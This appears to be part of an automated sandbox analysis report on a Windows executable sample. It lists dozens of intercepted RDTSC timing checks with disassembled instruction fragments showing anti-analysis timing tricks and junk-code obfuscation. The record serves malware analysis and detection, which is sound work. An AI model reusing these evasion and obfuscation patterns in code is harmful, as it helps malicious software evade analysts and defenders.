                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9DFBBA second address: 9DFBEC instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 jbe 00007FC8BCFEEF08h 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 pop edx 0x00000012 mov eax, dword ptr [esp+04h] 0x00000016 jg 00007FC8BCFEEF12h 0x0000001c mov eax, dword ptr [eax] 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 pushad 0x00000022 popad 0x00000023 pushad 0x00000024 popad 0x00000025 popad 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9DFD60 second address: 9DFD6A instructions: 0x00000000 rdtsc 0x00000002 jo 00007FC8BCD0701Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9E35E2 second address: 9E35E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9E8647 second address: 9E8652 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop esi 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9E87C4 second address: 9E87CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9E8D6C second address: 9E8D8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FC8BCD07016h 0x0000000a jmp 00007FC8BCD07028h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9E8D8E second address: 9E8DA5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC8BCFEEF11h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9E9091 second address: 9E9097 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9EB286 second address: 9EB297 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jnp 00007FC8BCFEEF0Eh 0x0000000e push esi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9EB30E second address: 9EB318 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FC8BCD07016h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9EB318 second address: 9EB362 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FC8BCFEEF08h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jmp 00007FC8BCFEEF14h 0x00000012 mov eax, dword ptr [esp+04h] 0x00000016 push ecx 0x00000017 jmp 00007FC8BCFEEF18h 0x0000001c pop ecx 0x0000001d mov eax, dword ptr [eax] 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 jne 00007FC8BCFEEF06h 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9EB362 second address: 9EB379 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC8BCD0701Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9EB379 second address: 9EB38F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jl 00007FC8BCFEEF06h 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9EB38F second address: 9EB395 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9EB5DD second address: 9EB5E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9EB6B4 second address: 9EB6BE instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FC8BCD07016h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9EB789 second address: 9EB78D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9EC0C7 second address: 9EC0CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9EC0CB second address: 9EC0D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007FC8BCFEEF0Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9EC3ED second address: 9EC3F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9EC3F1 second address: 9EC3F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9ECAB4 second address: 9ECAB8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9ECAB8 second address: 9ECABE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9ED46A second address: 9ED46E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9ED46E second address: 9ED48B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC8BCFEEF11h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jc 00007FC8BCFEEF06h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9ED48B second address: 9ED4FA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC8BCD07022h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d jns 00007FC8BCD07034h 0x00000013 add di, 6A4Ah 0x00000018 push 00000000h 0x0000001a mov edi, 4331D629h 0x0000001f movsx esi, cx 0x00000022 push 00000000h 0x00000024 mov edi, eax 0x00000026 xchg eax, ebx 0x00000027 jnc 00007FC8BCD07023h 0x0000002d push eax 0x0000002e pushad 0x0000002f push esi 0x00000030 pushad 0x00000031 popad 0x00000032 pop esi 0x00000033 push eax 0x00000034 push edx 0x00000035 push eax 0x00000036 push edx 0x00000037 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9ED4FA second address: 9ED4FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9EF5FE second address: 9EF602 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9F08A4 second address: 9F08B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC8BCFEEF10h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9F13CC second address: 9F13E7 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FC8BCD07016h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FC8BCD0701Bh 0x0000000f popad 0x00000010 push eax 0x00000011 pushad 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9F13E7 second address: 9F13ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9F2946 second address: 9F2950 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FC8BCD07016h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9F2950 second address: 9F2956 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9F3423 second address: 9F34B3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC8BCD0701Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FC8BCD07020h 0x0000000e popad 0x0000000f push eax 0x00000010 jl 00007FC8BCD0701Ah 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 pop edx 0x0000001a nop 0x0000001b push 00000000h 0x0000001d push ebx 0x0000001e call 00007FC8BCD07018h 0x00000023 pop ebx 0x00000024 mov dword ptr [esp+04h], ebx 0x00000028 add dword ptr [esp+04h], 00000014h 0x00000030 inc ebx 0x00000031 push ebx 0x00000032 ret 0x00000033 pop ebx 0x00000034 ret 0x00000035 xor dword ptr [ebp+122D2472h], ebx 0x0000003b mov dword ptr [ebp+122D2D4Ah], edx 0x00000041 push 00000000h 0x00000043 sbb edi, 221D04EBh 0x00000049 push 00000000h 0x0000004b push 00000000h 0x0000004d push ebx 0x0000004e call 00007FC8BCD07018h 0x00000053 pop ebx 0x00000054 mov dword ptr [esp+04h], ebx 0x00000058 add dword ptr [esp+04h], 00000019h 0x00000060 inc ebx 0x00000061 push ebx 0x00000062 ret 0x00000063 pop ebx 0x00000064 ret 0x00000065 mov dword ptr [ebp+1247FA99h], ecx 0x0000006b xchg eax, ebx 0x0000006c push eax 0x0000006d push edx 0x0000006e push ebx 0x0000006f pushad 0x00000070 popad 0x00000071 pop ebx 0x00000072 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9F34B3 second address: 9F34CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC8BCFEEF18h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9F4FEA second address: 9F4FF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9F3D6C second address: 9F3D7B instructions: 0x00000000 rdtsc 0x00000002 jne 00007FC8BCFEEF06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9F4FF0 second address: 9F5015 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC8BCD07029h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9AB926 second address: 9AB92C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9AB92C second address: 9AB931 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9AB931 second address: 9AB938 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9F7D97 second address: 9F7D9D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9F7D9D second address: 9F7DA7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007FC8BCFEEF06h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9F7DA7 second address: 9F7DB4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9F82FF second address: 9F8362 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 mov dword ptr [esp], eax 0x00000008 push 00000000h 0x0000000a push edi 0x0000000b call 00007FC8BCFEEF08h 0x00000010 pop edi 0x00000011 mov dword ptr [esp+04h], edi 0x00000015 add dword ptr [esp+04h], 00000018h 0x0000001d inc edi 0x0000001e push edi 0x0000001f ret 0x00000020 pop edi 0x00000021 ret 0x00000022 push 00000000h 0x00000024 sub bx, F700h 0x00000029 push 00000000h 0x0000002b jl 00007FC8BCFEEF0Eh 0x00000031 pushad 0x00000032 jl 00007FC8BCFEEF0Ch 0x00000038 jnp 00007FC8BCFEEF0Bh 0x0000003e sbb ax, 36D2h 0x00000043 popad 0x00000044 push eax 0x00000045 jo 00007FC8BCFEEF1Dh 0x0000004b push eax 0x0000004c push edx 0x0000004d push eax 0x0000004e push edx 0x0000004f rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9F8362 second address: 9F8366 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9F84B0 second address: 9F84C7 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FC8BCFEEF08h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f ja 00007FC8BCFEEF08h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9F94F0 second address: 9F94F5 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9FA29B second address: 9FA2F8 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 mov dword ptr [esp], eax 0x0000000a adc ebx, 782A5C1Ah 0x00000010 push 00000000h 0x00000012 call 00007FC8BCFEEF0Ah 0x00000017 cmc 0x00000018 pop edi 0x00000019 push 00000000h 0x0000001b push 00000000h 0x0000001d push edx 0x0000001e call 00007FC8BCFEEF08h 0x00000023 pop edx 0x00000024 mov dword ptr [esp+04h], edx 0x00000028 add dword ptr [esp+04h], 0000001Dh 0x00000030 inc edx 0x00000031 push edx 0x00000032 ret 0x00000033 pop edx 0x00000034 ret 0x00000035 movsx ebx, bx 0x00000038 push eax 0x00000039 push eax 0x0000003a push edx 0x0000003b jl 00007FC8BCFEEF12h 0x00000041 jmp 00007FC8BCFEEF0Ch 0x00000046 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9F94F5 second address: 9F9573 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a jmp 00007FC8BCD07024h 0x0000000f push dword ptr fs:[00000000h] 0x00000016 mov bx, 27AFh 0x0000001a mov dword ptr fs:[00000000h], esp 0x00000021 mov edi, dword ptr [ebp+122D2427h] 0x00000027 mov eax, dword ptr [ebp+122D09DDh] 0x0000002d push 00000000h 0x0000002f push ebp 0x00000030 call 00007FC8BCD07018h 0x00000035 pop ebp 0x00000036 mov dword ptr [esp+04h], ebp 0x0000003a add dword ptr [esp+04h], 0000001Dh 0x00000042 inc ebp 0x00000043 push ebp 0x00000044 ret 0x00000045 pop ebp 0x00000046 ret 0x00000047 mov dword ptr [ebp+122D1EDBh], eax 0x0000004d push FFFFFFFFh 0x0000004f mov dword ptr [ebp+122D2EBFh], ebx 0x00000055 nop 0x00000056 push eax 0x00000057 push edx 0x00000058 jnl 00007FC8BCD0701Ch 0x0000005e rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9F858A second address: 9F8597 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 je 00007FC8BCFEEF0Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9F8597 second address: 9F85BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 jnl 00007FC8BCD07034h 0x0000000c pushad 0x0000000d jmp 00007FC8BCD07026h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9FC1CD second address: 9FC1EF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007FC8BCFEEF08h 0x0000000c popad 0x0000000d push eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FC8BCFEEF0Fh 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9FC1EF second address: 9FC23F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC8BCD0701Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a push edx 0x0000000b pop edx 0x0000000c pop esi 0x0000000d popad 0x0000000e nop 0x0000000f push 00000000h 0x00000011 push ecx 0x00000012 call 00007FC8BCD07018h 0x00000017 pop ecx 0x00000018 mov dword ptr [esp+04h], ecx 0x0000001c add dword ptr [esp+04h], 0000001Ch 0x00000024 inc ecx 0x00000025 push ecx 0x00000026 ret 0x00000027 pop ecx 0x00000028 ret 0x00000029 mov dword ptr [ebp+122D2EBFh], ebx 0x0000002f push 00000000h 0x00000031 push eax 0x00000032 mov edi, ecx 0x00000034 pop ebx 0x00000035 push 00000000h 0x00000037 xchg eax, esi 0x00000038 jnp 00007FC8BCD07035h 0x0000003e pushad 0x0000003f push eax 0x00000040 push edx 0x00000041 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9FC23F second address: 9FC265 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC8BCFEEF17h 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jng 00007FC8BCFEEF06h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9FC265 second address: 9FC26F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9B248D second address: 9B2493 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9B2493 second address: 9B2497 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9FC3B7 second address: 9FC3BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9FC49D second address: 9FC4AF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b jg 00007FC8BCD07016h 0x00000011 pop edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9FF862 second address: 9FF870 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC8BCFEEF0Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9FF870 second address: 9FF87A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007FC8BCD07016h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9FEA2B second address: 9FEA2F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9FF87A second address: 9FF926 instructions: 0x00000000 rdtsc 0x00000002 je 00007FC8BCD07016h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d mov dword ptr [ebp+122D2ECFh], edx 0x00000013 push ebx 0x00000014 sub ebx, dword ptr [ebp+1247E6D7h] 0x0000001a pop edi 0x0000001b push 00000000h 0x0000001d push 00000000h 0x0000001f push ebp 0x00000020 call 00007FC8BCD07018h 0x00000025 pop ebp 0x00000026 mov dword ptr [esp+04h], ebp 0x0000002a add dword ptr [esp+04h], 00000014h 0x00000032 inc ebp 0x00000033 push ebp 0x00000034 ret 0x00000035 pop ebp 0x00000036 ret 0x00000037 mov di, 53E0h 0x0000003b jmp 00007FC8BCD07023h 0x00000040 push 00000000h 0x00000042 push 00000000h 0x00000044 push edx 0x00000045 call 00007FC8BCD07018h 0x0000004a pop edx 0x0000004b mov dword ptr [esp+04h], edx 0x0000004f add dword ptr [esp+04h], 0000001Ah 0x00000057 inc edx 0x00000058 push edx 0x00000059 ret 0x0000005a pop edx 0x0000005b ret 0x0000005c jnp 00007FC8BCD07019h 0x00000062 xchg eax, esi 0x00000063 push eax 0x00000064 push edx 0x00000065 pushad 0x00000066 jmp 00007FC8BCD07026h 0x0000006b jmp 00007FC8BCD07024h 0x00000070 popad 0x00000071 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9FEA2F second address: 9FEACA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FC8BCFEEF0Fh 0x0000000b popad 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push esi 0x00000012 call 00007FC8BCFEEF08h 0x00000017 pop esi 0x00000018 mov dword ptr [esp+04h], esi 0x0000001c add dword ptr [esp+04h], 00000018h 0x00000024 inc esi 0x00000025 push esi 0x00000026 ret 0x00000027 pop esi 0x00000028 ret 0x00000029 push dword ptr fs:[00000000h] 0x00000030 sub dword ptr [ebp+1246A7C5h], eax 0x00000036 mov dword ptr fs:[00000000h], esp 0x0000003d mov eax, dword ptr [ebp+122D09EDh] 0x00000043 jne 00007FC8BCFEEF09h 0x00000049 mov dword ptr [ebp+124675D2h], edx 0x0000004f push FFFFFFFFh 0x00000051 push 00000000h 0x00000053 push esi 0x00000054 call 00007FC8BCFEEF08h 0x00000059 pop esi 0x0000005a mov dword ptr [esp+04h], esi 0x0000005e add dword ptr [esp+04h], 00000017h 0x00000066 inc esi 0x00000067 push esi 0x00000068 ret 0x00000069 pop esi 0x0000006a ret 0x0000006b jmp 00007FC8BCFEEF0Dh 0x00000070 nop 0x00000071 push eax 0x00000072 push edx 0x00000073 jbe 00007FC8BCFEEF0Ch 0x00000079 push eax 0x0000007a push edx 0x0000007b rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9FF926 second address: 9FF930 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007FC8BCD07016h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9FEACA second address: 9FEACE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9FF930 second address: 9FF934 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9FEACE second address: 9FEAD8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007FC8BCFEEF06h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A00929 second address: A00936 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FC8BCD07016h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A00A8C second address: A00A99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pop edi 0x00000008 push eax 0x00000009 push ebx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
